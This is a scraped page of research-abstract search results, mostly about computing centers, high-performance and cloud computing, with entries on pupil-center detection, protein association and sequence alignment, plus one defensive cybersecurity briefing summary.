    Determining the pupil center is fundamental for calculating eye orientation in video-based systems. Existing techniques are error prone and not robust because eyelids, eyelashes, corneal reflections or shadows in many instances occlude the pupil. We have developed a new algorithm which utilizes curvature characteristics of the pupil boundary to eliminate these artifacts. Pupil center is computed based solely on points related to the pupil boundary. For each boundary point, a curvature value is computed. Occlusion of the boundary induces characteristic peaks in the curvature function. Curvature values for normal pupil sizes were determined and a threshold was found which together with heuristics discriminated normal from abnormal curvature. Remaining boundary points were fit with an ellipse using a least squares error criterion. The center of the ellipse is an estimate of the pupil center. This technique is robust and accurately estimates pupil center with less than 40% of the pupil boundary points visible.

  17. RIACS

    NASA Technical Reports Server (NTRS)

    Moore, Robert C.

    1998-01-01

    The Research Institute for Advanced Computer Science (RIACS) was established by the Universities Space Research Association (USRA) at the NASA Ames Research Center (ARC) on June 6, 1983. RIACS is privately operated by USRA, a consortium of universities that serves as a bridge between NASA and the academic community. Under a five-year co-operative agreement with NASA, research at RIACS is focused on areas that are strategically enabling to the Ames Research Center's role as NASA's Center of Excellence for Information Technology. Research is carried out by a staff of full-time scientist,augmented by visitors, students, post doctoral candidates and visiting university faculty. The primary mission of RIACS is charted to carry out research and development in computer science. This work is devoted in the main to tasks that are strategically enabling with respect to NASA's bold mission in space exploration and aeronautics. There are three foci for this work: Automated Reasoning. Human-Centered Computing. and High Performance Computing and Networking. RIACS has the additional goal of broadening the base of researcher in these areas of importance to the nation's space and aeronautics enterprises. Through its visiting scientist program, RIACS facilitates the participation of university-based researchers, including both faculty and students, in the research activities of NASA and RIACS. RIACS researchers work in close collaboration with NASA computer scientists on projects such as the Remote Agent Experiment on Deep Space One mission, and Super-Resolution Surface Modeling.

  18. On-demand provisioning of HEP compute resources on cloud sites and shared HPC centers

    NASA Astrophysics Data System (ADS)

    Erli, G.; Fischer, F.; Fleig, G.; Giffels, M.; Hauth, T.; Quast, G.; Schnepf, M.; Heese, J.; Leppert, K.; Arnaez de Pedro, J.; Sträter, R.

    2017-10-01

    This contribution reports on solutions, experiences and recent developments with the dynamic, on-demand provisioning of remote computing resources for analysis and simulation workflows. Local resources of a physics institute are extended by private and commercial cloud sites, ranging from the inclusion of desktop clusters over institute clusters to HPC centers. Rather than relying on dedicated HEP computing centers, it is nowadays more reasonable and flexible to utilize remote computing capacity via virtualization techniques or container concepts. We report on recent experience from incorporating a remote HPC center (NEMO Cluster, Freiburg University) and resources dynamically requested from the commercial provider 1&1 Internet SE into our intitute’s computing infrastructure. The Freiburg HPC resources are requested via the standard batch system, allowing HPC and HEP applications to be executed simultaneously, such that regular batch jobs run side by side to virtual machines managed via OpenStack [1]. For the inclusion of the 1&1 commercial resources, a Python API and SDK as well as the possibility to upload images were available. Large scale tests prove the capability to serve the scientific use case in the European 1&1 datacenters. The described environment at the Institute of Experimental Nuclear Physics (IEKP) at KIT serves the needs of researchers participating in the CMS and Belle II experiments. In total, resources exceeding half a million CPU hours have been provided by remote sites.

  19. White paper: A plan for cooperation between NASA and DARPA to establish a center for advanced architectures

    NASA Technical Reports Server (NTRS)

    Denning, P. J.; Adams, G. B., III; Brown, R. L.; Kanerva, P.; Leiner, B. M.; Raugh, M. R.

    1986-01-01

    Large, complex computer systems require many years of development. It is recognized that large scale systems are unlikely to be delivered in useful condition unless users are intimately involved throughout the design process. A mechanism is described that will involve users in the design of advanced computing systems and will accelerate the insertion of new systems into scientific research. This mechanism is embodied in a facility called the Center for Advanced Architectures (CAA). CAA would be a division of RIACS (Research Institute for Advanced Computer Science) and would receive its technical direction from a Scientific Advisory Board established by RIACS. The CAA described here is a possible implementation of a center envisaged in a proposed cooperation between NASA and DARPA.

  20. Bayesian Research at the NASA Ames Research Center,Computational Sciences Division

    NASA Technical Reports Server (NTRS)

    Morris, Robin D.

    2003-01-01

    NASA Ames Research Center is one of NASA s oldest centers, having started out as part of the National Advisory Committee on Aeronautics, (NACA). The site, about 40 miles south of San Francisco, still houses many wind tunnels and other aviation related departments. In recent years, with the growing realization that space exploration is heavily dependent on computing and data analysis, its focus has turned more towards Information Technology. The Computational Sciences Division has expanded rapidly as a result. In this article, I will give a brief overview of some of the past and present projects with a Bayesian content. Much more than is described here goes on with the Division. The web pages at http://ic.arc. nasa.gov give more information on these, and the other Division projects.

  1. Cyber Security: Big Data Think II Working Group Meeting

    NASA Technical Reports Server (NTRS)

    Hinke, Thomas; Shaw, Derek

    2015-01-01

    This presentation focuses on approaches that could be used by a data computation center to identify attacks and ensure malicious code and backdoors are identified if planted in system. The goal is to identify actionable security information from the mountain of data that flows into and out of an organization. The approaches are applicable to big data computational center and some must also use big data techniques to extract the actionable security information from the mountain of data that flows into and out of a data computational center. The briefing covers the detection of malicious delivery sites and techniques for reducing the mountain of data so that intrusion detection information can be useful, and not hidden in a plethora of false alerts. It also looks at the identification of possible unauthorized data exfiltration.

  2. Postdoctoral Fellow | Center for Cancer Research

    Cancer.gov

    The Neuro-Oncology Branch (NOB), Center for Cancer Research (CCR), National Cancer Institute (NCI) of the National Institutes of Health (NIH) is seeking outstanding postdoctoral candidates interested in studying metabolic and cell signaling pathways in the context of brain cancers through construction of computational models amenable to formal computational analysis and simulation. The ability to closely collaborate with the modern metabolomics center developed at CCR provides a unique opportunity for a postdoctoral candidate with a strong theoretical background and interest in demonstrating the incredible potential of computational approaches to solve problems from scientific disciplines and improve lives. The candidate will be given the opportunity to both construct data-driven models, as well as biologically validate the models by demonstrating the ability to predict the effects of altering tumor metabolism in laboratory and clinical settings.

  3. Tools for Analyzing Computing Resource Management Strategies and Algorithms for SDR Clouds

    NASA Astrophysics Data System (ADS)

    Marojevic, Vuk; Gomez-Miguelez, Ismael; Gelonch, Antoni

    2012-09-01

    Software defined radio (SDR) clouds centralize the computing resources of base stations. The computing resource pool is shared between radio operators and dynamically loads and unloads digital signal processing chains for providing wireless communications services on demand. Each new user session request particularly requires the allocation of computing resources for executing the corresponding SDR transceivers. The huge amount of computing resources of SDR cloud data centers and the numerous session requests at certain hours of a day require an efficient computing resource management. We propose a hierarchical approach, where the data center is divided in clusters that are managed in a distributed way. This paper presents a set of computing resource management tools for analyzing computing resource management strategies and algorithms for SDR clouds. We use the tools for evaluating a different strategies and algorithms. The results show that more sophisticated algorithms can achieve higher resource occupations and that a tradeoff exists between cluster size and algorithm complexity.

  4. Argonne Out Loud: Computation, Big Data, and the Future of Cities

    ScienceCinema

    Catlett, Charlie

    2018-01-16

    Charlie Catlett, a Senior Computer Scientist at Argonne and Director of the Urban Center for Computation and Data at the Computation Institute of the University of Chicago and Argonne, talks about how he and his colleagues are using high-performance computing, data analytics, and embedded systems to better understand and design cities.

  5. LaRC local area networks to support distributed computing

    NASA Technical Reports Server (NTRS)

    Riddle, E. P.

    1984-01-01

    The Langley Research Center's (LaRC) Local Area Network (LAN) effort is discussed. LaRC initiated the development of a LAN to support a growing distributed computing environment at the Center. The purpose of the network is to provide an improved capability (over inteactive and RJE terminal access) for sharing multivendor computer resources. Specifically, the network will provide a data highway for the transfer of files between mainframe computers, minicomputers, work stations, and personal computers. An important influence on the overall network design was the vital need of LaRC researchers to efficiently utilize the large CDC mainframe computers in the central scientific computing facility. Although there was a steady migration from a centralized to a distributed computing environment at LaRC in recent years, the work load on the central resources increased. Major emphasis in the network design was on communication with the central resources within the distributed environment. The network to be implemented will allow researchers to utilize the central resources, distributed minicomputers, work stations, and personal computers to obtain the proper level of computing power to efficiently perform their jobs.

  6. CILT2000: Ubiquitous Computing--Spanning the Digital Divide.

    ERIC Educational Resources Information Center

    Tinker, Robert; Vahey, Philip

    2002-01-01

    Discusses the role of ubiquitous and handheld computers in education. Summarizes the contributions of the Center for Innovative Learning Technologies (CILT) and describes the ubiquitous computing sessions at the CILT2000 Conference. (Author/YDS)

  7. ComputerTown: A Do-It-Yourself Community Computer Project. [Computer Town, USA and Other Microcomputer Based Alternatives to Traditional Learning Environments].

    ERIC Educational Resources Information Center

    Zamora, Ramon M.

    Alternative learning environments offering computer-related instruction are developing around the world. Storefront learning centers, museum-based computer facilities, and special theme parks are some of the new concepts. ComputerTown, USA! is a public access computer literacy project begun in 1979 to serve both adults and children in Menlo Park…

  8. Computer Center/DP Management. Papers Presented at the Association for Educational Data Systems Annual Convention (Phoenix, Arizona, May 3-7, 1976).

    ERIC Educational Resources Information Center

    Association for Educational Data Systems, Washington, DC.

    Fifteen papers on computer centers and data processing management presented at the Association for Educational Data Systems (AEDS) 1976 convention are included in this document. The first two papers review the recent controversy for proposed licensing of data processors, and they are followed by a description of the Institute for Certification of…

  9. 37. Photograph of plan for repairs to computer room, 1958, ...

    Library of Congress Historic Buildings Survey, Historic Engineering Record, Historic Landscapes Survey

    37. Photograph of plan for repairs to computer room, 1958, prepared by the Public Works Office, Underwater Sound Laboratory. Drawing on file at Caretaker Site Office, Naval Undersea Warfare Center, New London. Copyright-free. - Naval Undersea Warfare Center, Bowditch Hall, 600 feet east of Smith Street & 350 feet south of Columbia Cove, West bank of Thames River, New London, New London County, CT

  10. Ethics, Identity, and Political Vision: Toward a Justice-Centered Approach to Equity in Computer Science Education

    ERIC Educational Resources Information Center

    Vakil, Sepehr

    2018-01-01

    In this essay, Sepehr Vakil argues that a more serious engagement with critical traditions in education research is necessary to achieve a justice-centered approach to equity in computer science (CS) education. With CS rapidly emerging as a distinct feature of K-12 public education in the United States, calls to expand CS education are often…

  11. Investigating Impact Metrics for Performance for the US EPA National Center for Computational Toxicology (ACS Fall meeting)

    EPA Science Inventory

    The U.S. Environmental Protection Agency (EPA) Computational Toxicology Program integrates advances in biology, chemistry, and computer science to help prioritize chemicals for further research based on potential human health risks. This work involves computational and data drive...

  12. CHIRAL--A Computer Aided Application of the Cahn-Ingold-Prelog Rules.

    ERIC Educational Resources Information Center

    Meyer, Edgar F., Jr.

    1978-01-01

    A computer program is described for identification of chiral centers in molecules. Essential input to the program includes both atomic and bonding information. The program does not require computer graphic input-output. (BB)

  13. Facilities | Integrated Energy Solutions | NREL

    Science.gov Websites

    strategies needed to optimize our entire energy system. A photo of the high-performance computer at NREL . High-Performance Computing Data Center High-performance computing facilities at NREL provide high-speed

  14. Computers and Technological Forecasting

    ERIC Educational Resources Information Center

    Martino, Joseph P.

    1971-01-01

    Forecasting is becoming increasingly automated, thanks in large measure to the computer. It is now possible for a forecaster to submit his data to a computation center and call for the appropriate program. (No knowledge of statistics is required.) (Author)

  15. Applied Computational Fluid Dynamics at NASA Ames Research Center

    NASA Technical Reports Server (NTRS)

    Holst, Terry L.; Kwak, Dochan (Technical Monitor)

    1994-01-01

    The field of Computational Fluid Dynamics (CFD) has advanced to the point where it can now be used for many applications in fluid mechanics research and aerospace vehicle design. A few applications being explored at NASA Ames Research Center will be presented and discussed. The examples presented will range in speed from hypersonic to low speed incompressible flow applications. Most of the results will be from numerical solutions of the Navier-Stokes or Euler equations in three space dimensions for general geometry applications. Computational results will be used to highlight the presentation as appropriate. Advances in computational facilities including those associated with NASA's CAS (Computational Aerosciences) Project of the Federal HPCC (High Performance Computing and Communications) Program will be discussed. Finally, opportunities for future research will be presented and discussed. All material will be taken from non-sensitive, previously-published and widely-disseminated work.

  16. A resource-sharing model based on a repeated game in fog computing.

    PubMed

    Sun, Yan; Zhang, Nan

    2017-03-01

    With the rapid development of cloud computing techniques, the number of users is undergoing exponential growth. It is difficult for traditional data centers to perform many tasks in real time because of the limited bandwidth of resources. The concept of fog computing is proposed to support traditional cloud computing and to provide cloud services. In fog computing, the resource pool is composed of sporadic distributed resources that are more flexible and movable than a traditional data center. In this paper, we propose a fog computing structure and present a crowd-funding algorithm to integrate spare resources in the network. Furthermore, to encourage more resource owners to share their resources with the resource pool and to supervise the resource supporters as they actively perform their tasks, we propose an incentive mechanism in our algorithm. Simulation results show that our proposed incentive mechanism can effectively reduce the SLA violation rate and accelerate the completion of tasks.

  17. Design of a robotic vehicle with self-contained intelligent wheels

    NASA Astrophysics Data System (ADS)

    Poulson, Eric A.; Jacob, John S.; Gunderson, Robert W.; Abbott, Ben A.

    1998-08-01

    The Center for Intelligent Systems has developed a small robotic vehicle named the Advanced Rover Chassis 3 (ARC 3) with six identical intelligent wheel units attached to a payload via a passive linkage suspension system. All wheels are steerable, so the ARC 3 can move in any direction while rotating at any rate allowed by the terrain and motors. Each intelligent wheel unit contains a drive motor, steering motor, batteries, and computer. All wheel units are identical, so manufacturing, programing, and spare replacement are greatly simplified. The intelligent wheel concept would allow the number and placement of wheels on the vehicle to be changed with no changes to the control system, except to list the position of all the wheels relative to the vehicle center. The task of controlling the ARC 3 is distributed between one master computer and the wheel computers. Tasks such as controlling the steering motors and calculating the speed of each wheel relative to the vehicle speed in a corner are dependent on the location of a wheel relative to the vehicle center and ar processed by the wheel computers. Conflicts between the wheels are eliminated by computing the vehicle velocity control in the master computer. Various approaches to this distributed control problem, and various low level control methods, have been explored.

  18. Berkeley Lab - Materials Sciences Division

    Science.gov Websites

    Computational Study of Excited-State Phenomena in Energy Materials Center for X-ray Optics MSD Facilities Ion Facilities and Centers Staff Center for X-ray Optics Patrick Naulleau Director 510-486-4529 2-432 PNaulleau

  19. Parallel neural pathways in higher visual centers of the Drosophila brain that mediate wavelength-specific behavior

    PubMed Central

    Otsuna, Hideo; Shinomiya, Kazunori; Ito, Kei

    2014-01-01

    Compared with connections between the retinae and primary visual centers, relatively less is known in both mammals and insects about the functional segregation of neural pathways connecting primary and higher centers of the visual processing cascade. Here, using the Drosophila visual system as a model, we demonstrate two levels of parallel computation in the pathways that connect primary visual centers of the optic lobe to computational circuits embedded within deeper centers in the central brain. We show that a seemingly simple achromatic behavior, namely phototaxis, is under the control of several independent pathways, each of which is responsible for navigation towards unique wavelengths. Silencing just one pathway is enough to disturb phototaxis towards one characteristic monochromatic source, whereas phototactic behavior towards white light is not affected. The response spectrum of each demonstrable pathway is different from that of individual photoreceptors, suggesting subtractive computations. A choice assay between two colors showed that these pathways are responsible for navigation towards, but not for the detection itself of, the monochromatic light. The present study provides novel insights about how visual information is separated and processed in parallel to achieve robust control of an innate behavior. PMID:24574974

  20. Current state and future direction of computer systems at NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    Rogers, James L. (Editor); Tucker, Jerry H. (Editor)

    1992-01-01

    Computer systems have advanced at a rate unmatched by any other area of technology. As performance has dramatically increased there has been an equally dramatic reduction in cost. This constant cost performance improvement has precipitated the pervasiveness of computer systems into virtually all areas of technology. This improvement is due primarily to advances in microelectronics. Most people are now convinced that the new generation of supercomputers will be built using a large number (possibly thousands) of high performance microprocessors. Although the spectacular improvements in computer systems have come about because of these hardware advances, there has also been a steady improvement in software techniques. In an effort to understand how these hardware and software advances will effect research at NASA LaRC, the Computer Systems Technical Committee drafted this white paper to examine the current state and possible future directions of computer systems at the Center. This paper discusses selected important areas of computer systems including real-time systems, embedded systems, high performance computing, distributed computing networks, data acquisition systems, artificial intelligence, and visualization.

  1. Future of Department of Defense Cloud Computing Amid Cultural Confusion

    DTIC Science & Technology

    2013-03-01

    enterprise cloud - computing environment and transition to a public cloud service provider. Services have started the development of individual cloud - computing environments...endorsing cloud computing . It addresses related issues in matters of service culture changes and how strategic leaders will dictate the future of cloud ...through data center consolidation and individual Service provided cloud computing .

  2. Computer Needs and Computer Problems in Developing Countries.

    ERIC Educational Resources Information Center

    Huskey, Harry D.

    A survey of the computer environment in a developing country is provided. Levels of development are considered and the educational requirements of countries at various levels are discussed. Computer activities in India, Burma, Pakistan, Brazil and a United Nations sponsored educational center in Hungary are all described. (SK/Author)

  3. Computer Viruses. Legal and Policy Issues Facing Colleges and Universities.

    ERIC Educational Resources Information Center

    Johnson, David R.; And Others

    Compiled by various members of the higher educational community together with risk managers, computer center managers, and computer industry experts, this report recommends establishing policies on an institutional level to protect colleges and universities from computer viruses and the accompanying liability. Various aspects of the topic are…

  4. PACCE: Perl Algorithm to Compute Continuum and Equivalent Widths

    NASA Astrophysics Data System (ADS)

    Riffel, Rogério; Borges Vale, Tibério

    2011-05-01

    PACCE (Perl Algorithm to Compute continuum and Equivalent Widths) computes continuum and equivalent widths. PACCE is able to determine mean continuum and continuum at line center values, which are helpful in stellar population studies, and is also able to compute the uncertainties in the equivalent widths using photon statistics.

  5. Delivering an Informational Hub for Data at the National Center for Computational Toxicology (ACS Spring Meeting) 7 of 7

    EPA Science Inventory

    The U.S. Environmental Protection Agency (EPA) Computational Toxicology Program integrates advances in biology, chemistry, and computer science to help prioritize chemicals for further research based on potential human health risks. This work involves computational and data drive...

  6. 76 FR 1410 - Privacy Act of 1974; Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-01-10

    ...; Computer Matching Program AGENCY: Defense Manpower Data Center (DMDC), DoD. ACTION: Notice of a Computer... administrative burden, constitute a greater intrusion of the individual's privacy, and would result in additional... Liaison Officer, Department of Defense. Notice of a Computer Matching Program Among the Defense Manpower...

  7. Computers, Networks, and Desegregation at San Jose High Academy.

    ERIC Educational Resources Information Center

    Solomon, Gwen

    1987-01-01

    Describes magnet high school which was created in California to meet desegregation requirements and emphasizes computer technology. Highlights include local computer networks that connect science and music labs, the library/media center, business computer lab, writing lab, language arts skills lab, and social studies classrooms; software; teacher…

  8. The Effect of Computer Automation on Institutional Review Board (IRB) Office Efficiency

    ERIC Educational Resources Information Center

    Oder, Karl; Pittman, Stephanie

    2015-01-01

    Companies purchase computer systems to make their processes more efficient through automation. Some academic medical centers (AMC) have purchased computer systems for their institutional review boards (IRB) to increase efficiency and compliance with regulations. IRB computer systems are expensive to purchase, deploy, and maintain. An AMC should…

  9. Manual on characteristics of Landsat computer-compatible tapes produced by the EROS Data Center digital image processing system

    USGS Publications Warehouse

    Holkenbrink, Patrick F.

    1978-01-01

    Landsat data are received by National Aeronautics and Space Administration (NASA) tracking stations and converted into digital form on high-density tapes (HDTs) by the Image Processing Facility (IPF) at the Goddard Space Flight Center (GSFC), Greenbelt, Maryland. The HDTs are shipped to the EROS Data Center (EDC) where they are converted into customer products by the EROS Data Center digital image processing system (EDIPS). This document describes in detail one of these products: the computer-compatible tape (CCT) produced from Landsat-1, -2, and -3 multispectral scanner (MSS) data and Landsat-3 only return-beam vidicon (RBV) data. Landsat-1 and -2 RBV data will not be processed by IPF/EDIPS to CCT format.

  10. Computer modeling with randomized-controlled trial data informs the development of person-centered aged care homes.

    PubMed

    Chenoweth, Lynn; Vickland, Victor; Stein-Parbury, Jane; Jeon, Yun-Hee; Kenny, Patricia; Brodaty, Henry

    2015-10-01

    To answer questions on the essential components (services, operations and resources) of a person-centered aged care home (iHome) using computer simulation. iHome was developed with AnyLogic software using extant study data obtained from 60 Australian aged care homes, 900+ clients and 700+ aged care staff. Bayesian analysis of simulated trial data will determine the influence of different iHome characteristics on care service quality and client outcomes. Interim results: A person-centered aged care home (socio-cultural context) and care/lifestyle services (interactional environment) can produce positive outcomes for aged care clients (subjective experiences) in the simulated environment. Further testing will define essential characteristics of a person-centered care home.

  11. 77 FR 38630 - Open Internet Advisory Committee

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-06-28

    ... Computer Science and Co-Founder of the Berkman Center for Internet and Society, Harvard University, is... of Technology Computer Science and Artificial Intelligence Laboratory, is appointed vice-chairperson... Jennifer Rexford, Professor of Computer Science, Princeton University Dennis Roberson, Vice Provost...

  12. Exposure Science and the US EPA National Center for Computational Toxicology

    EPA Science Inventory

    The emerging field of computational toxicology applies mathematical and computer models and molecular biological and chemical approaches to explore both qualitative and quantitative relationships between sources of environmental pollutant exposure and adverse health outcomes. The...

  13. Storage and network bandwidth requirements through the year 2000 for the NASA Center for Computational Sciences

    NASA Technical Reports Server (NTRS)

    Salmon, Ellen

    1996-01-01

    The data storage and retrieval demands of space and Earth sciences researchers have made the NASA Center for Computational Sciences (NCCS) Mass Data Storage and Delivery System (MDSDS) one of the world's most active Convex UniTree systems. Science researchers formed the NCCS's Computer Environments and Research Requirements Committee (CERRC) to relate their projected supercomputing and mass storage requirements through the year 2000. Using the CERRC guidelines and observations of current usage, some detailed projections of requirements for MDSDS network bandwidth and mass storage capacity and performance are presented.

  14. TOSCA calculations and measurements for the SLAC SLC damping ring dipole magnet

    NASA Astrophysics Data System (ADS)

    Early, R. A.; Cobb, J. K.

    1985-04-01

    The SLAC damping ring dipole magnet was originally designed with removable nose pieces at the ends. Recently, a set of magnetic measurements was taken of the vertical component of induction along the center of the magnet for four different pole-end configurations and several current settings. The three dimensional computer code TOSCA, which is currently installed on the National Magnetic Fusion Energy Computer Center's Cray X-MP, was used to compute field values for the four configurations at current settings near saturation. Comparisons were made for magnetic induction as well as effective magnetic lengths for the different configurations.

  15. 1999 NCCS Highlights

    NASA Technical Reports Server (NTRS)

    Bennett, Jerome (Technical Monitor)

    2002-01-01

    The NASA Center for Computational Sciences (NCCS) is a high-performance scientific computing facility operated, maintained and managed by the Earth and Space Data Computing Division (ESDCD) of NASA Goddard Space Flight Center's (GSFC) Earth Sciences Directorate. The mission of the NCCS is to advance leading-edge science by providing the best people, computers, and data storage systems to NASA's Earth and space sciences programs and those of other U.S. Government agencies, universities, and private institutions. Among the many computationally demanding Earth science research efforts supported by the NCCS in Fiscal Year 1999 (FY99) are the NASA Seasonal-to-Interannual Prediction Project, the NASA Search and Rescue Mission, Earth gravitational model development efforts, the National Weather Service's North American Observing System program, Data Assimilation Office studies, a NASA-sponsored project at the Center for Ocean-Land-Atmosphere Studies, a NASA-sponsored microgravity project conducted by researchers at the City University of New York and the University of Pennsylvania, the completion of a satellite-derived global climate data set, simulations of a new geodynamo model, and studies of Earth's torque. This document presents highlights of these research efforts and an overview of the NCCS, its facilities, and its people.

  16. CMSA: a heterogeneous CPU/GPU computing system for multiple similar RNA/DNA sequence alignment.

    PubMed

    Chen, Xi; Wang, Chen; Tang, Shanjiang; Yu, Ce; Zou, Quan

    2017-06-24

    The multiple sequence alignment (MSA) is a classic and powerful technique for sequence analysis in bioinformatics. With the rapid growth of biological datasets, MSA parallelization becomes necessary to keep its running time in an acceptable level. Although there are a lot of work on MSA problems, their approaches are either insufficient or contain some implicit assumptions that limit the generality of usage. First, the information of users' sequences, including the sizes of datasets and the lengths of sequences, can be of arbitrary values and are generally unknown before submitted, which are unfortunately ignored by previous work. Second, the center star strategy is suited for aligning similar sequences. But its first stage, center sequence selection, is highly time-consuming and requires further optimization. Moreover, given the heterogeneous CPU/GPU platform, prior studies consider the MSA parallelization on GPU devices only, making the CPUs idle during the computation. Co-run computation, however, can maximize the utilization of the computing resources by enabling the workload computation on both CPU and GPU simultaneously. This paper presents CMSA, a robust and efficient MSA system for large-scale datasets on the heterogeneous CPU/GPU platform. It performs and optimizes multiple sequence alignment automatically for users' submitted sequences without any assumptions. CMSA adopts the co-run computation model so that both CPU and GPU devices are fully utilized. Moreover, CMSA proposes an improved center star strategy that reduces the time complexity of its center sequence selection process from O(mn 2 ) to O(mn). The experimental results show that CMSA achieves an up to 11× speedup and outperforms the state-of-the-art software. CMSA focuses on the multiple similar RNA/DNA sequence alignment and proposes a novel bitmap based algorithm to improve the center star strategy. We can conclude that harvesting the high performance of modern GPU is a promising approach to accelerate multiple sequence alignment. Besides, adopting the co-run computation model can maximize the entire system utilization significantly. The source code is available at https://github.com/wangvsa/CMSA .

  17. UC Merced Center for Computational Biology Final Report

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Colvin, Michael; Watanabe, Masakatsu

    Final report for the UC Merced Center for Computational Biology. The Center for Computational Biology (CCB) was established to support multidisciplinary scientific research and academic programs in computational biology at the new University of California campus in Merced. In 2003, the growing gap between biology research and education was documented in a report from the National Academy of Sciences, Bio2010 Transforming Undergraduate Education for Future Research Biologists. We believed that a new type of biological sciences undergraduate and graduate programs that emphasized biological concepts and considered biology as an information science would have a dramatic impact in enabling the transformationmore » of biology. UC Merced as newest UC campus and the first new U.S. research university of the 21st century was ideally suited to adopt an alternate strategy - to create a new Biological Sciences majors and graduate group that incorporated the strong computational and mathematical vision articulated in the Bio2010 report. CCB aimed to leverage this strong commitment at UC Merced to develop a new educational program based on the principle of biology as a quantitative, model-driven science. Also we expected that the center would be enable the dissemination of computational biology course materials to other university and feeder institutions, and foster research projects that exemplify a mathematical and computations-based approach to the life sciences. As this report describes, the CCB has been successful in achieving these goals, and multidisciplinary computational biology is now an integral part of UC Merced undergraduate, graduate and research programs in the life sciences. The CCB began in fall 2004 with the aid of an award from U.S. Department of Energy (DOE), under its Genomes to Life program of support for the development of research and educational infrastructure in the modern biological sciences. This report to DOE describes the research and academic programs made possible by the CCB from its inception until August, 2010, at the end of the final extension. Although DOE support for the center ended in August 2010, the CCB will continue to exist and support its original objectives. The research and academic programs fostered by the CCB have led to additional extramural funding from other agencies, and we anticipate that CCB will continue to provide support for quantitative and computational biology program at UC Merced for many years to come. Since its inception in fall 2004, CCB research projects have continuously had a multi-institutional collaboration with Lawrence Livermore National Laboratory (LLNL), and the National Center for Supercomputing Applications at the University of Illinois at Urbana-Champaign, as well as individual collaborators at other sites. CCB affiliated faculty cover a broad range of computational and mathematical research including molecular modeling, cell biology, applied math, evolutional biology, bioinformatics, etc. The CCB sponsored the first distinguished speaker series at UC Merced, which had an important role is spreading the word about the computational biology emphasis at this new campus. One of CCB's original goals is to help train a new generation of biologists who bridge the gap between the computational and life sciences. To archive this goal, by summer 2006, a new program - summer undergraduate internship program, have been established under CCB to train the highly mathematical and computationally intensive Biological Science researchers. By the end of summer 2010, 44 undergraduate students had gone through this program. Out of those participants, 11 students have been admitted to graduate schools and 10 more students are interested in pursuing graduate studies in the sciences. The center is also continuing to facilitate the development and dissemination of undergraduate and graduate course materials based on the latest research in computational biology.« less

  18. Computing Protein-Protein Association Affinity with Hybrid Steered Molecular Dynamics.

    PubMed

    Rodriguez, Roberto A; Yu, Lili; Chen, Liao Y

    2015-09-08

    Computing protein-protein association affinities is one of the fundamental challenges in computational biophysics/biochemistry. The overwhelming amount of statistics in the phase space of very high dimensions cannot be sufficiently sampled even with today's high-performance computing power. In this article, we extend a potential of mean force (PMF)-based approach, the hybrid steered molecular dynamics (hSMD) approach we developed for ligand-protein binding, to protein-protein association problems. For a protein complex consisting of two protomers, P1 and P2, we choose m (≥3) segments of P1 whose m centers of mass are to be steered in a chosen direction and n (≥3) segments of P2 whose n centers of mass are to be steered in the opposite direction. The coordinates of these m + n centers constitute a phase space of 3(m + n) dimensions (3(m + n)D). All other degrees of freedom of the proteins, ligands, solvents, and solutes are freely subject to the stochastic dynamics of the all-atom model system. Conducting SMD along a line in this phase space, we obtain the 3(m + n)D PMF difference between two chosen states: one single state in the associated state ensemble and one single state in the dissociated state ensemble. This PMF difference is the first of four contributors to the protein-protein association energy. The second contributor is the 3(m + n - 1)D partial partition in the associated state accounting for the rotations and fluctuations of the (m + n - 1) centers while fixing one of the m + n centers of the P1-P2 complex. The two other contributors are the 3(m - 1)D partial partition of P1 and the 3(n - 1)D partial partition of P2 accounting for the rotations and fluctuations of their m - 1 or n - 1 centers while fixing one of the m/n centers of P1/P2 in the dissociated state. Each of these three partial partitions can be factored exactly into a 6D partial partition in multiplication with a remaining factor accounting for the small fluctuations while fixing three of the centers of P1, P2, or the P1-P2 complex, respectively. These small fluctuations can be well-approximated as Gaussian, and every 6D partition can be reduced in an exact manner to three problems of 1D sampling, counting the rotations and fluctuations around one of the centers as being fixed. We implement this hSMD approach to the Ras-RalGDS complex, choosing three centers on RalGDS and three on Ras (m = n = 3). At a computing cost of about 71.6 wall-clock hours using 400 computing cores in parallel, we obtained the association energy, -9.2 ± 1.9 kcal/mol on the basis of CHARMM 36 parameters, which well agrees with the experimental data, -8.4 ± 0.2 kcal/mol.

  19. Trip attraction rates of shopping centers in Northern New Castle County, Delaware.

    DOT National Transportation Integrated Search

    2004-07-01

    This report presents the trip attraction rates of the shopping centers in Northern New : Castle County in Delaware. The study aims to provide an alternative to ITE Trip : Generation Manual (1997) for computing the trip attraction of shopping centers ...

  20. NETL - Supercomputing: NETL Simulation Based Engineering User Center (SBEUC)

    ScienceCinema

    None

    2018-02-07

    NETL's Simulation-Based Engineering User Center, or SBEUC, integrates one of the world's largest high-performance computers with an advanced visualization center. The SBEUC offers a collaborative environment among researchers at NETL sites and those working through the NETL-Regional University Alliance.

  1. Computer Bits: Child Care Center Management Software Buying Guide Update.

    ERIC Educational Resources Information Center

    Neugebauer, Roger

    1987-01-01

    Compares seven center management programs used for basic financial and data management tasks such as accounting, payroll and attendance records, and mailing lists. Describes three other specialized programs and gives guidelines for selecting the best software for a particular center. (NH)

  2. NETL - Supercomputing: NETL Simulation Based Engineering User Center (SBEUC)

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    None

    2013-09-30

    NETL's Simulation-Based Engineering User Center, or SBEUC, integrates one of the world's largest high-performance computers with an advanced visualization center. The SBEUC offers a collaborative environment among researchers at NETL sites and those working through the NETL-Regional University Alliance.

  3. McMillan Magnet School: A Case History of a School Acquiring a Critical Mass of Computer Technology and Internet Connectivity.

    ERIC Educational Resources Information Center

    Grandgenett, Neal; And Others

    McMillan Magnet Center is located in urban Omaha, Nebraska, and specializes in math, computers, and communications. Once a junior high school, it was converted to a magnet center for seventh and eighth graders in the 1983-84 school year as part of Omaha's voluntary desegregation plan. Now the ethnic makeup of the student population is about 50%…

  4. Study of the Use of Time-Mean Vortices to Generate Lift for MAV Applications

    DTIC Science & Technology

    2011-05-31

    microplate to in-plane resonance. Computational effort centers around optimization of a range of parameters (geometry, frequency, amplitude of oscillation, etc...issue involved. Towards this end, a suspended microplate was fabricated via MEMS technology and driven to in-plane resonance via Lorentz force...force to drive the suspended MEMS-based microplate to in-plane resonance. Computational effort centers around optimization of a range of parameters

  5. ICAM (Integrated Computer Aided Manufacturing) Conceptual Design for Computer-Integrated Manufacturing. Volume 1. Project Overview and Technical Summary

    DTIC Science & Technology

    1984-06-29

